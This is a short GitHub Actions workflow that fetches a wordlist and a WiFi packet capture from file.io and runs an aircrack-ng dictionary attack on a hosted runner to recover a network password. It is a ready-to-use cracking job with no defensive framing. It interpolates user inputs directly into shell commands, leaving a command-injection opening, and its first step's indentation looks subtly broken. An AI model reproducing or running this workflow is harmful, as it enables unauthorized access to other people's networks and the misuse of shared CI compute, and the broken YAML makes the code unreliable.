name: WiFi Cracking with Aircrack-ng

on:
  workflow_dispatch:
    inputs:
      fileio_link_dictionary:
        description: 'Shareable link to the dictionary text file from file.io'
        required: true
      fileio_link_pcap:
        description: 'Shareable link to the pcap/cap file from file.io'
        required: true

jobs:
  crack_wifi:
    runs-on: ubuntu-latest
    steps:
      - name: Download Dictionary File
        run: |
            sudo apt install -y jq
          fileio_link="${{ github.event.inputs.fileio_link_dictionary }}"
          download_url=$(curl -s $fileio_link | jq -r '.link')
          curl -L -o dictionary.txt "$download_url"
        shell: bash
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Download PCAP File
        run: |
          fileio_link="${{ github.event.inputs.fileio_link_pcap }}"
          download_url=$(curl -s $fileio_link | jq -r '.link')
          curl -L -o wifi_capture.pcap "$download_url"
        shell: bash
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      
      - name: Install Aircrack-ng
        run: |
          sudo apt update
          sudo apt install -y aircrack-ng
        shell: bash

      - name: Run Aircrack-ng
        run: |
          aircrack-ng -w dictionary.txt wifi_capture.pcap
        shell: bash
